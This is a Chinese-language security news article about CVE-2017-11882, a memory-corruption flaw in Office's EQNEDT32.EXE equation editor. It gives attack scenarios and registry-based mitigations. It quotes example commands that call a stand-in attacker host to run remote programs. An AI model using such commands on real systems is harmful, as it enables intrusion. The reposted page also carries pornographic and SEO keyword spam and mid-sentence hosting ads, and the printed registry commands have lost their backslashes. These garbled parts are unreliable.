欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到云服務器

云安全

微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意

當人們仍在著急處理“沒有補丁”的微軟MS Office內置DDE功能威脅時,有研究人員又發現了Office的另一個嚴重漏洞,攻擊者可以利用該漏洞,香港網存空間 北京主機,無需受害者用戶交互,遠程向目標系統植入惡意軟件。該漏洞屬于內存破壞型漏洞,可影響微軟過去17年發布的所有MS Office版本軟件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在內的所有微軟Windows操作系統中實現。

漏洞信息

該漏洞由Embedi公司研究員發現,漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。

微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意

由于不正確的內存操作,組件EQNEDT32.EXE會無法正確處理內存中的執行對象,這種破壞條件,致使攻擊者可在當前系統登錄用戶環境下,利用Office遠程植入惡意代碼或其它惡意程序。

微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件,并保留至Microsoft Office 2007之后發布的所有Office 版本中,以確保新舊軟件的文檔兼容。

微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意

該漏洞的成功利用需要受害者用Office打開攻擊者特制的惡意文檔,如果與微軟的內核提權漏洞(如CVE-2017-11847)組合利用,攻擊者將會獲得受害者目標系統的完全控制權。以下視頻是在Windows 7,8,10系統中該漏洞的成功實現過程演示:

漏洞技術分析

可能的攻擊場景

Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景:

當插入一些OLE(對象鏈接嵌入)實體時,可能會觸發該漏洞,實現一些惡意命令的執行,如向某個攻擊者架設網站下載執行惡意程序等。

最直接有效的漏洞利用方式就是,訪問攻擊者架設或控制的WebDAV服務器,深圳論壇空間 香港主機,并執行其中的運行程序。

不過,攻擊者還能利用該漏洞執行cmd.exe /c start \attacker_ip f類似惡意命令,配合入侵或啟動WebClient服務。

另外,攻擊者還能使用諸如\attacker_ip f.exe的命令向受害者系統中執行惡意程序,惡意程序的啟動機制與\live.sysinternals.com ools service方式類似。

緩解和修復措施

在11月的補丁修復周期中,微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制,并發布了多個漏洞補丁更新,強烈建議用戶及時進行下載更新。

鑒于EQNEDT32.EXE組件的不確定隱患,我們建議用戶通過以下注冊表命令來對其進行禁用:

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400

如果在64位操作系統中安裝了32位的MS Office軟件,命令如下:

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400

騰訊云代理

Copyright © 2003-2021 MFISP.COM. 國外vps服務器租用 夢飛云服務器租用 版權所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 吉木乃县| 句容市| 全南县| 南岸区| 科技| 延长县| 玉田县| 陇川县| 德令哈市| 桐庐县| 西华县| 阿瓦提县| 双辽市| 金寨县| 内丘县| 阿巴嘎旗| 西和县| 抚松县| 普宁市| 罗田县| 阜平县| 墨脱县| 林州市| 图们市| 安西县| 六盘水市| 通化县| 平阴县| 云林县| 乐昌市| 镇巴县| 遵化市| 九龙城区| 赤壁市| 定南县| 保山市| 蓝山县| 措美县| 从江县| 安平县| 大竹县|